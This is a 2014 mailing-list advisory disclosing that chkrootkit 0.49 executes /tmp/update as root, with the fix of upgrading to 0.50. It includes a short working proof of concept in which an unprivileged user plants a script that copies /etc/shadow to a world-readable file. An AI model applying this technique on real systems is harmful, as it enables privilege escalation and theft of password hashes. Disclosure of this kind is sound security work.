[Slackbuilds-users] chkrootkit vulnerability

mancha mancha1 at hush.com
Thu Jun 5 06:27:35 UTC 2014


Hi.

As ironic as it sounds, chkrootkit 0.49 can be turned into a 
rootkit.

On systems where /tmp is not mounted noexec, a regular user can 
create a 
file /tmp/update which chkrootkit will execute with root privileges 
each
time it's run.

Here's a simple PoC...as normal user: 

$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update

As root:

# chkrootkit

Now the user has access to the shadow password file (/tmp/stolen).

Solution: Update to chkrootkit 0.50

--mancha

-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF  ADD1 2516 8EB2 4F0B 22AC]



More information about the SlackBuilds-users mailing list